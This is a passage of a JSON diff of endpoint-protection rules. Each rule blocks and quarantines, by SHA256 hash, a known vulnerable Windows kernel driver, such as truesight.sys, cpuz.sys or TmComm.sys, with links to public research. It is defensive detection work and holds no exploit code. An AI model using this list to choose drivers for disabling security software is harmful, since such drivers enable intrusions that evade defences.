"hash", + "value": "e308f38ebb979e8a4608476c3d081e4410f657e7b031fe7103650a59f58e1208", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f53bb847-fb15-594f-969c-495cfb249ddd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817133Z", + "creation_date": "2026-03-23T11:45:31.817135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "801cb16225aaf3bebff46eaf5d9b0158ee0d1ccc4534dc6220b9cc18986a0c5b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f541314b-82e6-57c3-8e22-719892582cea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477318Z", + "creation_date": "2026-03-23T11:45:30.477322Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7048d90ed4c83ad52eb9c677f615627b32815066e34230c3b407ebb01279bae6", + "comment": "Vulnerable Kernel Driver (aka elbycdio.sys) [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5423fa1-87e0-574f-ad5c-ef249230edab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832642Z", + "creation_date": "2026-03-23T11:45:30.832644Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832649Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f5ff9939a42d48ce8c6eacd51fc62609b735e2b7a052df3e696051074348577", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f552cbf3-2637-54c5-9866-f240df35cda1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154149Z", + "creation_date": "2026-03-23T11:45:31.154152Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154158Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6f979e48c56cc6358b21b467012c19aa0e4c32134a5fe964158cb69caf4cd8d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f564c890-13d8-5d82-8fe1-0ee953d2687f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.479439Z", + "creation_date": 
"2026-03-23T11:45:30.479441Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.479447Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0452a6e8f00bae0b79335c1799a26b2b77d603451f2e6cc3b137ad91996d4dec", + "comment": "Vulnerable Kernel Driver (aka segwindrvx64.sys) [https://www.loldrivers.io/drivers/a4aa80bc-4ecd-49ab-bc0f-0f49b07fdd7f/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5674847-1ece-5c90-8da5-be6e995a22c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972703Z", + "creation_date": "2026-03-23T11:45:29.972705Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972711Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f86fc8a6eaa3b38f33be4a0d552c184e575afa50a60df7383c06a394e3926d8", + "comment": "TG Soft vulnerable driver (aka viragt.sys and viragt64.sys) [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"f579ee1f-f584-5ac3-b4cf-e3ce74f94c12", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974017Z", + "creation_date": "2026-03-23T11:45:29.974019Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974024Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dbc604b4e01362a3e51357af4a87686834fe913852a4e0a8c0d4c1a0f7d076ed", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f57af528-7d70-5074-9b6a-77947d9636ab", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.142556Z", + "creation_date": "2026-03-23T11:45:32.142573Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:32.142586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b3c9af8c4be8f62d25b955f92d2a4e9ebd34f7fa787580454ef54241102e7b30", + "comment": "Vulnerable Rentdrv2 Driver (aka rentdrv2_x32.sys and rentdrv_x64.sys) [https://github.com/keowu/BadRentdrv2, https://unit42.paloaltonetworks.com/agonizing-serpens-targets-israeli-tech-higher-ed-sectors/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f580852a-12f0-5cc7-a76c-90b7f670e29a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490893Z", + "creation_date": "2026-03-23T11:45:31.490897Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490905Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e6a1562b6f7385619258db40f1cf4593d1025cf97401462000840acd3c32ad16", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5876ff0-5366-544d-bc29-3cfb047613e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.454821Z", + "creation_date": "2026-03-23T11:45:30.454824Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.454832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5195443274ee3a382e947f03fd409437730434c2af0c1bb1c99f5ba1953f989e", + "comment": "Vulnerable Kernel Driver (aka mhyprotrpg.Sys) [https://www.loldrivers.io/drivers/ebdde780-e142-44e7-a998-504c516f4695/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f590dc70-3db6-5651-b9ee-4bfa323dd917", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456161Z", + "creation_date": "2026-03-23T11:45:30.456164Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456174Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cac6f11d37bf2438a7f07053bbe692bb135bc06c245b56e8411e3bd906e15f98", + "comment": "Vulnerable Kernel Driver (aka fd3b7234419fafc9bdd533f48896ed73_b816c5cd.sys) [https://www.loldrivers.io/drivers/c7f76931-e24c-4d94-9e1f-5a083da581b4/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5910f1a-42e1-5198-b510-8ae37cf1ba3b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.455759Z", + "creation_date": "2026-03-23T11:45:30.455762Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.455771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1b17d12076d047e74d15e6e51e10497ad49419bec7fbe93386c57d3efbaadc0b", + "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5916de2-3783-5006-9926-459c90f6bb4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.472590Z", + "creation_date": "2026-03-23T11:45:30.472593Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.472603Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b0f6cd34717d0cea5ab394b39a9de3a479ca472a071540a595117219d9a61a44", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5918195-7664-5e6e-b0c9-2699a1ba478f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481295Z", + "creation_date": "2026-03-23T11:45:31.481298Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481308Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec46f787b37654072b52fbc17d46607d1f14c8b4a25552a1bff8e10eb89c1a80", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f595ae79-3203-57fb-bf81-27fc77f86e8d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493901Z", + "creation_date": "2026-03-23T11:45:31.493905Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493914Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b79dd4c9467d0d07b6a19a7768e5f9ded0778550b5f0f014a80ae44e67e0fdd3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f597f5f1-8407-5a49-9aa1-f201e884d881", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.822979Z", + "creation_date": 
"2026-03-23T11:45:31.822982Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.822992Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "950cbe3e38dfad78a935486807a8dbf85c77b8d0a792c994262591442c6ea6d1", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f59c15cf-1a92-5afc-b5f5-7045c01fefbd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471860Z", + "creation_date": "2026-03-23T11:45:30.471863Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471895Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f7e0cca8ad9ea1e34fa1a5e0533a746b2fa0988ba56b01542bc43841e463b686", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5aa971a-891d-51e5-bbf0-c16ac657fe77", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146894Z", + "creation_date": "2026-03-23T11:45:31.146896Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146901Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f4198e14658e61eb7d1fbfa145b931e3fa03fc6b14163334eb4f7b778878e94", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5ac64eb-5984-5256-b980-4537596fce6c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474302Z", + "creation_date": "2026-03-23T11:45:30.474305Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.474314Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4d29b1c2fff1a67d911229f36570e3d9b1cab0397d2cbc858b665403f1add3a3", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5b92a6e-367d-55d7-83b2-7458c68749ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490592Z", + "creation_date": "2026-03-23T11:45:31.490594Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490599Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63ed062dec8512b5aba5d56efa1dc143eefcce2fbcf01216f81a4391f68cbfaa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5cf39cc-5fb6-5de5-8a4b-8b753ff26166", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.817391Z", + "creation_date": "2026-03-23T11:45:31.817393Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.817399Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "05192e72245e1e5c83e5ae4a16d99322dc108ffc0efa646d01aac9ba372e1c66", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5d0f6c2-5215-531f-93f9-8ad988c3cf4f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829536Z", + "creation_date": "2026-03-23T11:45:30.829538Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829544Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"1e998bb646c9bb81595fd6a221962afd563f3be775ede6fe436be1a51de2f5bb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5da464e-1382-5a3e-8b64-3df9fa52e0b0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820930Z", + "creation_date": "2026-03-23T11:45:31.820933Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820942Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6ce761d6203906d8a79f26c08f04228088c3668b015fd8da5083f60a0266cd28", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5dace71-146f-5f80-9f12-43281bcfdfcd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.456508Z", + "creation_date": "2026-03-23T11:45:30.456512Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.456521Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b6ae324b84a4632cf690dd565954d64b205104fc3fa42181612c3f5b830579c6", + "comment": "Vulnerable Kernel Driver (aka iobitunlocker.sys) [https://www.loldrivers.io/drivers/e368efc7-cf69-47ae-8204-f69dac000b22/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "f5e163df-6d31-577e-a3ac-14cd99442c61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 